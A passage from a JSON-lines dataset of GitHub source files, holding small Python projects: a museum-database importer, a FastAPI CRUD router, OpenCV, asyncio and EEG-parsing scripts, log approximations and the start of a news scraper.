Extra(codice_dbunico2=m.codice_dbunico2,tipo=\"traduzioni_orario\",attributo=t,valore=m.traduzioni_orario[t])\n db.add(extrasql) \n \n if len(m.traduzioni_orario_biglietteria) > 0:\n for t in m.traduzioni_orario_biglietteria:\n extrasql = Extra(codice_dbunico2=m.codice_dbunico2,tipo=\"traduzioni_orario_biglietteria\",attributo=t,valore=m.traduzioni_orario_biglietteria[t])\n db.add(extrasql) \n \n\n if len(m.traduzioni_prenotazioni_telefono) > 0:\n for t in m.traduzioni_prenotazioni_telefono:\n extrasql = Extra(codice_dbunico2=m.codice_dbunico2,tipo=\"traduzioni_prenotazioni_telefono\",attributo=t,valore=m.traduzioni_prenotazioni_telefono[t])\n db.add(extrasql) \n\n if len(m.traduzioni_telefono) > 0:\n for t in m.traduzioni_telefono:\n extrasql = Extra(codice_dbunico2=m.codice_dbunico2,tipo=\"traduzioni_telefono\",attributo=t,valore=m.traduzioni_telefono[t])\n db.add(extrasql) \n \n if len(m.traduzioni_telefono_biglietteria) > 0:\n for t in m.traduzioni_telefono_biglietteria:\n extrasql = Extra(codice_dbunico2=m.codice_dbunico2,tipo=\"traduzioni_telefono_biglietteria\",attributo=t,valore=m.traduzioni_telefono_biglietteria[t])\n db.add(extrasql) \n\n if len(m.traduzioni_riduzioni_biglietto) > 0:\n for t in m.traduzioni_riduzioni_biglietto:\n extrasql = Extra(codice_dbunico2=m.codice_dbunico2,tipo=\"traduzioni_riduzioni_biglietto\",attributo=t,valore=m.traduzioni_riduzioni_biglietto[t])\n db.add(extrasql) \n\n \n if len(m.indirizzi) > 0: \n for ind in m.indirizzi:\n point='POINT(%s %s)' % (ind['longitudine'],ind['latitudine'])\n indirizzosql = Indirizzi(codice_dbunico2=m.codice_dbunico2, indirizzo=ind['indirizzo'], \n cap=ind['cap'], comune=ind['comune'], localita=ind['localita'], provincia=ind['provincia'], \n regione=ind['regione'], latitudine=ind['latitudine'], longitudine=ind['longitudine'], \n istat_comune=ind['istat_comune'], istat_provincia=ind['istat_provincia'], \n istat_regione=ind['istat_regione'], geom=point)\n db.add(indirizzosql) \n \n point='POINT(%s %s)' % (m.longitudine,m.latitudine)\n luoghiculturasql = LuoghiCultura(cap=m.cap,categoria=m.categoria,chiusurasettimanale=m.chiusurasettimanale,\n codice_dbunico2=m.codice_dbunico2, codice_entecompetente_dbunico20=m.codice_entecompetente_dbunico20,\n codice_entecompetente_mibac=m.codice_entecompetente_mibac,codice_entegestore_dbunico20=m.codice_entegestore_dbunico20,\n codice_entegestore_mibac=m.codice_entegestore_mibac,comune=m.comune,costo_biglietto=m.costo_biglietto,\n data_validazione=m.data_validazione,data_ultima_modifica=m.data_ultima_modifica,\n data_creazione_xml=m.data_creazione_xml,descrizione=m.descrizione, email=m.email, email_biglietteria=m.email_biglietteria,\n email_certificata=m.email_certificata, entecompetente=m.entecompetente,entecompilatore=m.entecompilatore,entegestore=m.entegestore,\n fax=m.fax,fax_biglietteria=m.fax_biglietteria,idtipologialuogo=m.idtipologialuogo, img=m.img,indirizzo=m.indirizzo,istat_regione=m.istat_regione,\n istat_provincia=m.istat_provincia,istat_comune=m.istat_comune,latitudine=m.latitudine,localita=m.localita, longitudine=m.longitudine,\n nome_redattore=m.nome_redattore,nome_capo_redattore=m.nome_capo_redattore, nome=m.nome, orario=m.orario, \n orario_biglietteria=m.orario_biglietteria, prenotazioni_sitoweb=m.prenotazioni_sitoweb,prenotazioni_email=m.prenotazioni_email, \n prenotazioni_telefono=m.prenotazioni_telefono, proprieta=m.proprieta, provincia=m.provincia,responsabile=m.responsabile, \n regione=m.regione, riduzioni_biglietto=m.riduzioni_biglietto, ruolo_entecompetente=m.ruolo_entecompetente, \n ruolo_entegestore=m.ruolo_entegestore, stato=m.stato, sitoweb=m.sitoweb, sorgente=m.sorgente, telefono=m.telefono,\n telefono_biglietteria=m.telefono_biglietteria, tipologia=m.tipologia,tipologialuogo=m.tipologialuogo, tipo_prenotazioni=m.tipo_prenotazioni,\n geom=point) \n db.add(luoghiculturasql) \ndb.session.commit()\n \n","repo_name":"napo/musei2csv","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8525,"program_lang":"python","lang":"it","doc_type":"code","stars":0,"dataset":"github-code","pt":"41"} +{"seq_id":"3253009974","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri May 31 21:36:14 2019\n\n@author: haimingwd\n\"\"\"\n\ndef merge(intervals):\n if not intervals:\n return []\n intervals.sort(key = lambda ea:ea[0])\n res = [intervals[0]]\n for ea in intervals:\n last = res[-1]\n if ea[0] > last[1]:\n res.append(ea)\n elif ea[1] > last[1]:\n last[1] = ea[1]\n return res\n\nmerge([[1,3],[2,6],[8,10],[15,18]])","repo_name":"hightrol/LeetCode","sub_path":"MergeIntervals 56.py","file_name":"MergeIntervals 56.py","file_ext":"py","file_size_in_byte":430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"41"} +{"seq_id":"31430921195","text":"# define get, insert, update & delete methods\r\nfrom fastapi import APIRouter\r\nfrom model.request import ListingRequest, ListingUpdateRequest\r\nfrom model.response import response\r\nfrom model.listing import Listing\r\nfrom db.database import Database\r\nfrom sqlalchemy import and_, desc\r\n\r\n# APIRouter creates path operations for product module\r\nrouter = APIRouter(\r\n prefix=\"/listings\",\r\n tags=[\"Listing\"],\r\n responses={404: {\"description\": \"Not found\"}},\r\n)\r\n\r\ndatabase = Database()\r\nengine = database.get_db_connection()\r\n\r\n\r\n@router.post(\"/add\", response_description=\"Listing data added into the database\")\r\nasync def add_listing(listing_req: ListingRequest):\r\n # prepare listing object\r\n new_listing = Listing()\r\n new_listing.address = listing_req.address\r\n new_listing.price = listing_req.price\r\n session = database.get_db_session(engine)\r\n session.add(new_listing)\r\n session.flush()\r\n # get id of the inserted product\r\n session.refresh(new_listing, attribute_names=['listing_id'])\r\n data = {\"listing_id\": new_listing.listing_id}\r\n session.commit()\r\n session.close()\r\n return response(data, 200, \"Listing added successfully.\", False)\r\n\r\n\r\n@router.put(\"/update\")\r\nasync def update_listing(listing_update_req: ListingUpdateRequest):\r\n listing_id = listing_update_req.listing_id\r\n session = database.get_db_session(engine)\r\n try:\r\n is_listing_updated = session.query(Listing).filter(Listing.listing_id == listing_id).update({\r\n Listing.address: listing_update_req.address, Listing.price: listing_update_req.price\r\n }, synchronize_session=False)\r\n session.flush()\r\n session.commit()\r\n response_msg = \"Listing updated successfully\"\r\n response_code = 200\r\n error = False\r\n if is_listing_updated == 1:\r\n # After successful update, retrieve updated data from db\r\n data = session.query(Listing).filter(\r\n Listing.listing_id == listing_id).one()\r\n elif is_listing_updated == 0:\r\n response_msg = \"Listing not updated. No Listing found with this id :\" + \\\r\n str(listing_id)\r\n error = True\r\n data = None\r\n return response(data, response_code, response_msg, error)\r\n except Exception as ex:\r\n print(\"Error : \", ex)\r\n\r\n\r\n@router.delete(\"/{listing_id}/delete\")\r\nasync def delete_listing(listing_id: int):\r\n session = database.get_db_session(engine)\r\n try:\r\n is_deleted = session.query(Listing).filter(Listing.listing_id == listing_id).delete()\r\n session.flush()\r\n session.commit()\r\n response_msg = \"Listing deleted successfully\"\r\n response_code = 200\r\n error = False\r\n data = {\"listing_id\": listing_id}\r\n if is_deleted == 0:\r\n response_msg = \"Listing not deleted. No Listing found with this id :\" + \\\r\n str(listing_id)\r\n error = True\r\n data = None\r\n return response(data, response_code, response_msg, error)\r\n except Exception as ex:\r\n print(\"Error : \", ex)\r\n\r\n\r\n@router.get(\"/{listing_id}\")\r\nasync def read_product(listing_id: int):\r\n session = database.get_db_session(engine)\r\n response_message = \"Listing retrieved successfully\"\r\n data = None\r\n try:\r\n data = session.query(Listing).filter(Listing.listing_id == listing_id).one()\r\n except Exception as ex:\r\n print(\"Error\", ex)\r\n response_message = \"Listing Not found\"\r\n error = False\r\n return response(data, 200, response_message, error)\r\n\r\n\r\n@router.get(\"/\")\r\nasync def read_all_listings(page_size: int, page: int):\r\n session = database.get_db_session(engine)\r\n data = session.query(Listing).order_by(\r\n desc(Listing.listing_id)).limit(page_size).offset((page-1)*page_size).all()\r\n return response(data, 200, \"Products retrieved successfully.\", False)\r\n\r\n","repo_name":"mainframeali/CrudDemo","sub_path":"endpoint/crud.py","file_name":"crud.py","file_ext":"py","file_size_in_byte":3911,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"41"} +{"seq_id":"35414518083","text":"#This program reads in a text file and returns the a new file with the same \r\n# content but with line numbers\r\nfile = input(\"Enter in a file you want to open and remake:\")\r\nrfile = open(file,\"r\")\r\nwfile = open(\"New File.txt\",\"w\")\r\ncount = 0\r\nfor line in rfile:\r\n count = count + 1\r\n linee = str(count) + \" \" + line\r\n wfile.write(str(linee))\r\nrfile.close()\r\nwfile.close()\r\n","repo_name":"zackbell123/ZackBell-DataStructures-HomeWork","sub_path":"File Line Numbers.py","file_name":"File Line Numbers.py","file_ext":"py","file_size_in_byte":381,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"41"} +{"seq_id":"32091025858","text":"import cv2\nimport numpy as np\n# 导入图片\nimg = cv2.imread('hello.jpeg')\n\n#灰度化\ngray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\n# cv2.imshow('gray',gray)\n#二值化\nret,threshold = cv2.threshold(gray,100,255,cv2.THRESH_BINARY)\n# cv2.imshow('threshold',threshold)\n#查找轮廓\nimge, controus, tree = cv2.findContours(threshold,cv2.RETR_TREE,cv2.CHAIN_APPROX_SIMPLE)\n\n#最小外接矩形\nr = cv2.minAreaRect(controus[1])\nbox = cv2.boxPoints(r) #拿到了起始点宽高\nbox = np.int0(box) #box是浮点型的,需要强转\ncv2.drawContours(img, [box],0,(0,0,255),2) #因为box是个数组所以[box]\n\n#最大外接矩形\nx,y,w,h = cv2.boundingRect(controus[1])\nprint(x,y,w,h )\ncv2.rectangle(img, (x,y),(x+w,y+h),(255,0,0),3)\n\n\ncv2.imshow('img',img)\nwhile True:\n key = cv2.waitKey(1)\n if key & 0xff == ord('q'):\n break\n\ncv2.destroyAllWindows()","repo_name":"octopuslearn/python","sub_path":"opencv_new_231114/start_231114/第十章/外接矩形.py","file_name":"外接矩形.py","file_ext":"py","file_size_in_byte":864,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"41"} +{"seq_id":"30842257737","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\n#import cv2\r\n\r\ndef dummy(img2):\r\n\tf = 3\r\n\tm,n = img2.shape\r\n\timg3 = np.zeros((m, n))\r\n\tI = img2\r\n\tfor i in range(0, m):\r\n\t\tfor j in range(0, n):\r\n\t\t\tt = np.floor(i/f)\r\n\t\t\tr = np.floor(j/f)\r\n\t\t\tt1 = round(t)\r\n\t\t\tr1 = round(r)\r\n\t\t\tA = [[1,0,0,0],[1,1,0,0],[1, 0, 1,0],[1,1,1,1]]\r\n\t\t\tY = [I[t1,r1], I[t1+1, r1], I[t1,r1+1], I[t1+1,r1+1]]\r\n\t\t\tres = np.linalg.inv(A).dot(Y)\r\n\t\t\timg3[i, j] = round(res[0] + res[1]*(t - t1) + res[2]*(r -r1) +res[3]*(r-r1)*(t -t1))\r\n\treturn img3\r\n#img = cv2.imread('images\\Flowers.png')\r\n#img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\r\n#img3 = dummy(img)\r\n#plt.imshow(img3, cmap='gray')\r\n#plt.show()","repo_name":"Ajeet-kumar1/Digital-image-processing-M.tech-IISc","sub_path":"Assignment 2/dumm.py","file_name":"dumm.py","file_ext":"py","file_size_in_byte":676,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"41"} +{"seq_id":"24667171746","text":"import asyncio\n\n\nasync def sub_printer():\n print('Hi from the sub-printer')\n\n\nasync def printer():\n print('Before creating the sub-printer task')\n asyncio.create_task(sub_printer())\n print('After creating the sub-printer task')\n\n\nasync def main():\n asyncio.create_task(printer())\n await shutdown()\n\n\nasync def shutdown(timeout=5):\n tasks = []\n # Collect all tasks from `asyncio`\n for task in asyncio.all_tasks():\n # Make sure we skip our current task so we don't loop\n if task is not asyncio.current_task():\n tasks.append(task)\n\n for future in asyncio.as_completed(tasks, timeout=timeout):\n await future\n\nasyncio.run(main())\n","repo_name":"mastering-python/code_2","sub_path":"CH_13_async_io/T_18_wait_for_all_tasks.py","file_name":"T_18_wait_for_all_tasks.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"en","doc_type":"code","stars":44,"dataset":"github-code","pt":"41"} +{"seq_id":"24406260575","text":"import csv\r\nimport math\r\nimport pygame\r\nimport sys\r\n# takes a wave absolute row and gives accumulates the values and counts\r\n\r\n\r\ndef addabsolute(row):\r\n count = 0\r\n res = 0\r\n for i in range(2, 6):\r\n if row[i] != \"nan\" or row[i] != \"0\":\r\n count += 1\r\n res += float(row[i])\r\n return res, count;\r\n\r\n# Resets the dictionary for next segment\r\n\r\n\r\ndef resetWavesDict():\r\n return {\" /muse/elements/alpha_absolute\": (0, 0),\r\n \" /muse/elements/beta_absolute\": (0, 0),\r\n \" /muse/elements/gamma_absolute\": (0, 0),\r\n \" /muse/elements/experimental/concentration\": (0, 0)}\r\n\r\n# calculates the wave data and puts it into a list\r\n\r\n\r\ndef calculatewaves(wavesDict):\r\n listres = []\r\n for key in wavesDict.keys():\r\n listres.append(float(wavesDict[key][0]) / (float(wavesDict[key][1]) + 1.0))\r\n return listres\r\n\r\n\r\ndef rateWaves(lower, upper, compare):\r\n waveNames = [\"alpha\", \"beta\", \"gamma\", \"concentration\"]\r\n waveRatings = [None] * 4\r\n flipped = False\r\n for i in range(0, 4):\r\n if lower[i] > upper[i]:\r\n flipped = True\r\n temp = lower[i]\r\n lower[i] = upper[i]\r\n upper[i] = temp\r\n waveRatings[i] = 0.0\r\n if compare[i] <= lower[i]:\r\n print(waveNames[i] + \": very relaxing\")\r\n if flipped is False:\r\n waveRatings[i] = 0.0\r\n if flipped is True:\r\n waveRatings[i] = 10.0\r\n elif compare[i] >= upper[i]:\r\n print(waveNames[i] + \": not relaxing\")\r\n if flipped is False:\r\n waveRatings[i] = 10.0\r\n if flipped is True:\r\n waveRatings[i] = 0.0\r\n else:\r\n print(i)\r\n print(upper[i])\r\n if flipped is False:\r\n waveRatings[i] = ((float(compare[i]) - float(lower[i])) * 10.0) / (float(upper[i]) - float(lower[i]))\r\n if flipped is True:\r\n waveRatings[i] = 10 - ((float(compare[i]) - float(lower[i])) * 10.0) / (float(upper[i]) - float(lower[i]))\r\n\r\n return waveRatings\r\n\r\n\r\nif __name__ == '__main__':\r\n f = open(\"C:/Users/binph/Downloads/recording_8.csv\", 'rt');\r\n reader = csv.reader(f)\r\n firstrow = next(reader)\r\n count = 0\r\n wavesDict = {\" /muse/elements/alpha_absolute\": (0, 0),\r\n \" /muse/elements/beta_absolute\": (0, 0),\r\n \" /muse/elements/gamma_absolute\": (0, 0),\r\n \" /muse/elements/experimental/concentration\": (0, 0)}\r\n amountofpics = 8\r\n timePer = 20\r\n starttime = int(math.floor(float(firstrow[0])))\r\n lasttime = starttime + timePer\r\n currentQuestion = 1\r\n resList = []\r\n\r\n for row in reader:\r\n if (int(math.floor(float(row[0]))) >= lasttime):\r\n starttime = lasttime\r\n lasttime = starttime + timePer\r\n newlist = calculatewaves(wavesDict)\r\n resList.append(newlist)\r\n wavesDict = resetWavesDict()\r\n currentQuestion += 1\r\n\r\n if (currentQuestion > amountofpics):\r\n break\r\n # tuple to carry values and count of a eeg\r\n currRes = (0, 0)\r\n if row[1] == \" /muse/elements/alpha_absolute\":\r\n # get values and count, update dictionary, and also the result page\r\n currRes = addabsolute(row)\r\n oldValues = wavesDict[row[1]]\r\n wavesDict[row[1]] = (oldValues[0] + currRes[0], oldValues[1] + currRes[1])\r\n if row[1] == \" /muse/elements/beta_absolute\":\r\n currRes = addabsolute(row)\r\n oldValues = wavesDict[row[1]]\r\n wavesDict[row[1]] = (oldValues[0] + currRes[0], oldValues[1] + currRes[1])\r\n if row[1] == \" /muse/elements/gamma_absolute\":\r\n currRes = addabsolute(row)\r\n oldValues = wavesDict[row[1]]\r\n wavesDict[row[1]] = (oldValues[0] + currRes[0], oldValues[1] + currRes[1])\r\n if row[1] == \" /muse/elements/experimental/concentration\":\r\n oldValues = wavesDict[row[1]]\r\n if row[1] != \"nan\":\r\n wavesDict[row[1]] = (oldValues[0] + float(row[2]), oldValues[1] + 1)\r\n\r\n print(len(resList))\r\n upperbound = resList[1]\r\n lowerbound = resList[3]\r\n compare = resList[5]\r\n compare2 = resList[7]\r\n print(resList)\r\n results = (rateWaves(lowerbound, upperbound, compare))\r\n results2 = (rateWaves(lowerbound, upperbound, compare2))\r\n #display results\r\n\r\n pygame.init()\r\n display_width = 800\r\n display_height = 600\r\n black = (0, 0, 0)\r\n white = (255, 255, 255)\r\n red = (255, 0, 0)\r\n gameDisplay = pygame.display.set_mode((display_width, display_height))\r\n pygame.display.set_caption(\"hi\")\r\n basicfont = pygame.font.SysFont(None, 40)\r\n crashed = False\r\n while not crashed:\r\n\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n crashed = True\r\n text = basicfont.render(\"Old Spice\", True, (255, 255, 255), (0, 0, 0))\r\n textrect = text.get_rect()\r\n textrect.center = ((display_width / 2), (1 * display_height / 11))\r\n gameDisplay.blit(text, textrect)\r\n text = basicfont.render('Alpha: ' + str(results[0]), True, (255, 255, 255), (0, 0, 0))\r\n textrect = text.get_rect()\r\n textrect.center = ((display_width / 2), (2 * display_height / 11))\r\n gameDisplay.blit(text, textrect)\r\n text2 = basicfont.render('Beta: ' + str(results[1]), True, (255, 255, 255), (0, 0, 0))\r\n textrect2 = text.get_rect()\r\n textrect2.center = ((display_width / 2), (3*display_height / 11))\r\n gameDisplay.blit(text2, textrect2)\r\n text3 = basicfont.render('Gamma: ' + str(results[2]), True, (255, 255, 255), (0, 0, 0))\r\n textrect3 = text3.get_rect()\r\n textrect3.center = ((display_width / 2), (4*display_height / 11))\r\n gameDisplay.blit(text3, textrect3)\r\n text4 = basicfont.render('Concentration: ' + str(results[3]), True, (255, 255, 255), (0, 0, 0))\r\n textrect4 = text4.get_rect()\r\n textrect4.center = ((display_width / 2), (5*display_height / 11))\r\n gameDisplay.blit(text4, textrect4)\r\n ##########################################\r\n text = basicfont.render(\"Chevy\", True, (255, 255, 255), (0, 0, 0))\r\n textrect = text.get_rect()\r\n textrect.center = ((display_width / 2), (6 * display_height / 11))\r\n gameDisplay.blit(text, textrect)\r\n\r\n text = basicfont.render('Alpha: ' + str(results2[0]), True, (255, 255, 255), (0, 0, 0))\r\n textrect = text.get_rect()\r\n textrect.center = ((display_width / 2), (7*display_height / 11))\r\n gameDisplay.blit(text, textrect)\r\n text2 = basicfont.render('Beta: ' + str(results2[1]), True, (255, 255, 255), (0, 0, 0))\r\n textrect2 = text.get_rect()\r\n textrect2.center = ((display_width / 2), (8 * display_height / 11))\r\n gameDisplay.blit(text2, textrect2)\r\n text3 = basicfont.render('Gamma: ' + str(results2[2]), True, (255, 255, 255), (0, 0, 0))\r\n textrect3 = text3.get_rect()\r\n textrect3.center = ((display_width / 2), (9 * display_height / 11))\r\n gameDisplay.blit(text3, textrect3)\r\n text4 = basicfont.render('Concentration: ' + str(results2[3]), True, (255, 255, 255), (0, 0, 0))\r\n textrect4 = text4.get_rect()\r\n textrect4.center = ((display_width / 2), (10 * display_height / 11))\r\n gameDisplay.blit(text4, textrect4)\r\n pygame.display.update()\r\n\r\n #f.close()\r\n","repo_name":"TidesMind/DubHacks","sub_path":"CSVParse.py","file_name":"CSVParse.py","file_ext":"py","file_size_in_byte":7761,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"41"} +{"seq_id":"38010465002","text":"import re\nidxPhoneDic = {}\nwith open('/tmp4/eric11220/MLDS_Final/conf/48-idx.map', 'U') as inf:\n for line in inf:\n phone, idx = line.strip().split(' ')\n idxPhoneDic[int(idx)] = phone\n\n \ntheirMapDic = {}\nwith open('/tmp4/eric11220/MLDS_Final/conf/48_idx_chr.map', 'U') as inf:\n for line in inf:\n line = line.strip()\n line = re.split('\\t| +', line)\n first, sec, third = line\n theirMapDic[first] = int(sec)\n\noutf = open('predict_results', 'w')\nwith open('7models.txt', 'U') as inf:\n inf.readline()\n for line in inf:\n idx, label = line.strip().split(',')\n outf.write(str(theirMapDic[label]) + '\\n')\n\n\n","repo_name":"changjenyin/DNN_HMM_RNN_speech","sub_path":"data_preprocessing/others_mapping/map_to_their_map.py","file_name":"map_to_their_map.py","file_ext":"py","file_size_in_byte":672,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"41"} +{"seq_id":"20094769021","text":"a=int(input(\"enter the numbers\"))\r\nsum=0\r\ntemp=a\r\nwhile temp!=0:\r\n i=temp%10\r\n sum=sum+i*i*i\r\n temp=temp//10\r\nif (a==sum):\r\n print(\"armstrong number\")\r\nelse:\r\n print(\"non armstrong number\")","repo_name":"iamsuryakant/knighthood","sub_path":"armstrong.py","file_name":"armstrong.py","file_ext":"py","file_size_in_byte":204,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"41"} +{"seq_id":"70809899964","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Apr 23 13:24:03 2019\r\n\r\n@author: User\r\n\"\"\"\r\nfrom matplotlib.pyplot import *\r\nfrom scipy import *\r\nimport scipy.integrate as integrate\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\n\r\n\r\n\r\ndef fastlogapprox(x, n):\r\n a = zeros(n)\r\n g = zeros(n)\r\n d = zeros((n,n))\r\n a[0] = 0.5*(1+x)\r\n g[0] = sqrt(x)\r\n for i in range(1,n):\r\n a[i] = 0.5*(a[i-1]+g[i-1])\r\n g[i] = sqrt(a[i]*g[i-1])\r\n d[0,:] = a\r\n for i in range(0,n):\r\n d[i,i] = (a[i] - 4**(-i)*a[i-1])/(1-4**(-i))\r\n return (x-1)/d[-1,-1]\r\n\r\nfor k in range(1, 5):\r\n x_vals = np.linspace(0, 100, 1000)\r\n y_vals = fastlogapprox(x_vals, k)\r\n plt.plot(x_vals, y_vals)\r\n plt.title (\"shit\")\r\n plt.xlabel('x')\r\n plt.ylabel('square root of x')\r\n plt.legend()\r\n plt.show()\r\n\r\n\r\n\r\nq = np.abs(np.log(3) - fastlogapprox(3,2))\r\nw = np.abs(np.log(3) - fastlogapprox(3,3))\r\nr = np.abs(np.log(3) - fastlogapprox(3,4))\r\nt = np.abs(np.log(3) - fastlogapprox(3,5))\r\nu = 1e-19\r\nz = 1e-05\r\n\r\nplt.plot(3, q, color='blue', label='2 Iterations')\r\nplt.plot(3, w, color='green', label='3 Iterations')\r\nplt.plot(3, r, color='red', label='4 Iterations')\r\nplt.plot(3, t, color='cyan', label='5 Iterations')\r\nplt.legend(loc='upper left')\r\nplt.title('Error behavior of the accelerated Carlsson Method for the log')\r\nplt.xlabel('x')\r\nplt.ylabel('error')\r\nplt.axis([0, 20, u, z])\r\nplt.show()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n#def applog(a,x):\r\n# a0=(1+x)/2\r\n# b0=sqrt(x)\r\n# a=[]\r\n#\r\n# for i in range(n):\r\n# a0=(a0+b0)/2\r\n# b0=sqrt((a0)*b0)\r\n# a.append(n)\r\n#\r\n# return np.array((x-1)/a0)\r\n\r\n\r\n\r\n\r\n#print(\"the log approximation is: \" , ((applog(4,4))))\r\n#print(\"log value----------------:\" , (np.log(4)) )\r\n\r\n#error=(abs( applog(4,4)- (np.log(4)) ) )\r\n#print(\"the error is : \", error)\r\n\r\n\r\n#x = np.linspace(10, 500, 100)\r\n#plt.plot(x, (applog(4,x)),color='blue', label='approx ln(x)' )\r\n#plt.plot(x, np.log(x), color='red', label='ln(x)')\r\n#plt.legend(loc='upper left')\r\n#plt.show()\r\n#plt.plot(x,abs(np.log(x)-applog(4,x)) )\r\n#plt.show()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\nprint(\"----------------------------------------------------------------------\")\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n#x = 4\r\n#def a_0(x):\r\n#\treturn 0.5*(1+x)\r\n#def g_0(x):\r\n#\treturn sqrt(x)\r\n#m_1 = {}\r\n#m_2 = {}\r\n#def H(n):\r\n#\tif n in m_1 and m_2:\r\n#\t\treturn m_1[n]\r\n#\t\treturn m_2[n]\r\n#\tif n == 0:\r\n#\t\tm_1[n] = a_0(x)\r\n#\t\tm_2[n] = g_0(x)\r\n#\telif n == 1:\r\n#\t\tm_1[n] = 0.5*(a_0(x) + g_0(x))\r\n#\t\tm_2[n] = sqrt(g_0(x)*0.5*(a_0(x) + g_0(x)))\r\n#\telif n >= 2:\r\n#\t\tm_1[n] = 0.5*(m_1[n-1] + m_2[n-1])\r\n#\t\tm_2[n] = sqrt(m_1[n]*m_2[n-1])\r\n#\treturn m_1[n] and m_2[n]\r\n\r\n\r\n#Q = {r:H(r) for r in range(1, 40000)}\r\n#M = [H(k) for k in range(0,40000)]\r\n#A = [m_1[k] for k in range(0,40000)]\r\n#print(\"--------------------------------------------\")\r\n#m_4 = {}\r\n#N = list(A)\r\n#n = 3\r\n#X = x-2\r\n#def leg(x,n):\r\n#\tdef d(v,n):\r\n#\t\tif v in m_4:\r\n#\t\t\treturn m_4[v]\r\n#\t\tif v == 0:\r\n#\t\t\tR = A[n]\r\n#\t\telif v == 1:\r\n#\t\t\tR = (A[n] -(2**(-2))*A[n-1])/(1- 2**(-2))\r\n#\t\telif v >= 2:\r\n#\t\t\tR = (d(v-1, n) -(2**(-2*v))*d(v-1, n-1))/(1-2**(-2*v))\r\n#\t\tm_4[v] = R\r\n#\t\treturn R\r\n#\treturn (1+x)/d(n,n)\r\n#print(leg(X,n))\r\n#\r\n#x_v = linspace(3, 4003, 100000)\r\n#n_q = range(1, 10)\r\n#y_1 = leg(2,n)\r\n#y_2 = abs(leg(2,n_q)- log(2))\r\n##plot(x_v ,y_1, label='leg(x,n)')\r\n#plot(x_v ,y_2, label='error')\r\n#title ('plopp')\r\n#xlabel('x')\r\n#ylabel('leg(x)')\r\n#legend()\r\n#show()\r\n\r\n\r\n\r\n#print(\"-------------------------------------------\")\r\n\r\n#X = x-2\r\n#def leg(X):\r\n#\treturn (1+X)/d(n,n)\r\n#print(\"______________\")\r\n#print(leg(X))\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"AmerHussein/Tensor-class","sub_path":"Ny mapp/hectors log(x).py","file_name":"hectors log(x).py","file_ext":"py","file_size_in_byte":3626,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"41"} +{"seq_id":"19897508628","text":"\n# coding: utf-8\n\n# In[201]:\n\nimport requests\nfrom bs4 import BeautifulSoup\nimport dateutil.parser as parser\nimport time\n\nclass News:\n Article = ''\n Title = ''\n Author = ''\n OriginalContent = ''\n CreatedDate = ''\n FetchedDate = ''\n ArticleUrl = ''\n LastUsed = ''\n \n def __init__(self, article , title , author , originalcontent , createddate , fetcheddate , articleurl , lastused ):\n self.Article = article\n self.Title = title\n self.OriginalContent = originalcontent\n self.CreatedDate = createddate\n self.FetchedDate = fetcheddate\n self.ArticleUrl = articleurl\n self.LastUsed = lastused\n self.Author = author\n \ndef scraping(href):\n headers = {'user-agent' : 'Mozilla/5.0'}\n if (requests.get(href, headers = headers)):\n source = requests.get(href, headers = headers)\n if (BeautifulSoup(source.content, \"lxml\")):\n soup = BeautifulSoup(source.content, \"lxml\").body \n news = News(None, None, None, None, None, None, None, None)\n date = time.strftime('%Y-%m-%d %H:%M:%S',time.localtime(time.time()))\n news.fetchedDate = date\n news.lastUsed = date \n news.articleUrl = href\n \n class_list_main = [ \n 'col-md-12',\n 'content-wrapper clearfix detail-block-md',\n 'entry-content',\n 'column column-two-third site-content',\n 'large-8 medium-12 columns first',\n 'article',\n 'article_body'\n 'container',\n 'span8'\n ]\n \n for i in range(len(class_list_main)):\n if (soup.findAll(\"\",{'class':class_list_main[i]})):\n# print(class_list_main[i])\n content_list = soup.findAll(\"\",{'class':class_list_main[i]})\n# print (content_list)\n for content in content_list:\n scrape_details(content,news)\n break\n else:\n content = soup\n scrape_details(content,news)\n \n print ('URL********************************************************')\n print (news.articleUrl)\n print ('TITLE********************************************************')\n print (news.title)\n print ('DATE********************************************************')\n print (news.createdDate)\n print ('AUTHOR********************************************************')\n print (news.author)\n print ('ARTICLE********************************************************')\n print (news.article) \n else:\n print ('can not get the information!')\n else:\n print ('can not connect to the web page!')\n \n\n\n# In[216]:\n\ndef scrape_details(content,news): \n news.content = content\n# print (news.content)\n class_list_title = [\n 'entry-title',\n 'entry-title single-title',\n 'col-lg-9 col-md-8',\n 'name post-title entry-title',\n 'articleTitle',\n 'artTitle',\n 'blog-title',\n 'postarea',\n 'full-page-article left-col',\n 'post_title',\n 'post-title',\n 'content-header ',\n 'field-subhead'\n ] \n for i in range(len(class_list_title)):\n if (content.find('',{'class':class_list_title[i]})):\n news.title = content.find('',{'class':class_list_title[i]}).text\n break\n else:\n news.title = None\n\n class_list_paragraph = [\n 'ArticleBody__articleBody___1GSGP',\n 'art-postcontent',\n 'articles2',\n 'article-inner',\n 'article-text', \n 'article-content',\n 'article-copy',\n 'article_body',\n 'articleContentData',\n 'b-item__description',\n 'content-main',\n 'content-text', \n 'entry-content clearfix',\n 